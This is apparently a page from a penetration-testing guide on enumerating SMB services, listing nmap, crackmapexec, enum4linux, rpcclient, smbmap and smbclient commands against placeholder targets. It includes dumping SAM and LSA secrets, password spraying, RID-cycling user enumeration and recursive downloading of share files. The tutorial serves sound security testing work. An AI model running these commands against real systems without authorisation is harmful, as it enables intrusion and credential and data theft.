The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • SMB General Enumeration
  • User enumeration
  • rpcclient enumeration - port: 135
  • RID CYCLING ATTACK
  • Shares enumeration
  • Netbios Enumeration- Port 139
  • LANMAN1 Error
  1. Active
  2. Services

139,445 - SMB

Introduction

Port: 139,445 (TCP)

The Server Message Block (SMB) is a network protocol used by Windows-based computers that allow systems within the same network to share files. This service can run on either port 139 or port 445 by default.

SMB General Enumeration

A quick way to discover NetBIOS services on a network is with nbtscan.

nbtscan -r <NETWORK>/<MASK>

With Nmap, you can obtain domains, groups, processes, services, sessions, shares and users.

sudo nmap --script "smb-enum-*" -p139,445 <TARGET>
sudo nmap --script "smb2*" -p139,445 <TARGET>

Then, you can check for vulnerabilities.

sudo nmap --script "smb-vuln-*" -p139,445 <TARGET>

Thanks to crackmapexec and valid credentials, you can obtain helpful information with the following options:

  • --sam

  • --lsa

  • --sessions

  • --loggedon-users

  • --disks

  • --local-groups

  • --pass-pol

  • --rid-brute

  • --shares

crackmapexec smb <IP|RANGE> -d <DOMAIN> -u '<USERNAME>' -p '[ <PASSWORD> ]' [--<Option>]

Finally, you can use enum4linux to gather even more information:

enum4linux -a [-u "username" -p "password"] <IP>enum4linux -A [-u "username" -p "password"] <IP>enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

User enumeration

After executing the Nmap scan, you should check if it allows NULL, guest or anonymous login to check if shares are available.

Note: -N is for not prompting for a password.

smbclient -N -L //<IP>/ [-U "[guest|anonymous]%[guest]"]

With crackmapexec this can be achieve with the following command.

crackmapexec smb <IP|RANGE> -d <DOMAIN> -u '<USERNAMES.TXT>' -p '[ <PASSWORDS.TXT> ]'

rpcclient enumeration - port: 135

Thanks to rpcclient, you can obtain information about the domain, printers, groups and users.

rpcclient -U '[<USERNAME>]' [-N] <TARGET> 
> querydominfo
> querydispinfo
> getdompwinfo
> enumdomusers
> enumprinters
> querydispinfo
> netshareenum
> netshareenumall

RID CYCLING ATTACK

Enumerate users by brute-forcing the RID on the remote target.

crackmapexec smb <IP> -d <DOMAIN>  -u '<USERNAME>' -p '<PASSWORD>' {--rid-brute | --users}
lookupsid.py '<DOMAIN>/<USERNAME>%<PASSWORD>'@<TARGET> [-no-pass]

Shares enumeration

Once checked that the attacker has access to the SMB service, it has to check the permissions for each share:

smbmap [-u "<USERNAME>" -p "[<PASSWORD>|<NTLM<_HASH>]"] -H <IP>
crackmapexec smb <IP|RANGE> -u '[<USERNAME>]' [-p '[<PASSWORD>]' | -H <NTLM_HASH> ] --shares
./checkSMBPermissions.sh <DOMAIN\\USER> <PASSWORD> <IP>

In case of read access, you can list the files of each share:

smbclient -L //<IP>/<SHARE> -U "[<USERNAME>]%[<PASSWORD>]"
# Recursive list
smbmap [-u "<USERNAME>" -p "<PASSWORD>"] -R [<SHARE>] -H <IP> [-P <PORT>] 
# Non-Recursive list
smbmap [-u "<USERNAME>" -p "<PASSWORD>"] -r [<SHARE>] -H <IP> [-P <PORT>] 

Finally, you can access a share to upload or download the files manually or recursively.

smbclient //IP/<SHARE> -U "[<USERNAME>]%[<PASSWORD>]"
# Manually
smb: \> get <FILE>
smb: \> put <LOCAL_FILE>
# Recursive download
smb: \> prompt
smb: \> recurse
smb: \> mget *

Alternatively, you can mount a share to explore it.

sudo apt-get install cifs-utils
mount -t cifs //<IP>/<SHARE> <LOCAL_FOLDER> -o 'user=,password='

Netbios Enumeration- Port 139

nmblookup -A IPnbtscan IP 

LANMAN1 Error

On older hosts, you can encounter errors interacting with them. As a solution add client min protocol = LANMAN1 to GLOBAL setting in /etc/samba/smb.conf

# Change this to the workgroup/NT-domain name your Samba server will part of
    workgroup = WORKGROUP
    client min protocol = LANMAN1
#### Networking ####

Another alternative is using --option='client min protocol'=LANMAN1 with the smbclient command.

Last updated 1 year ago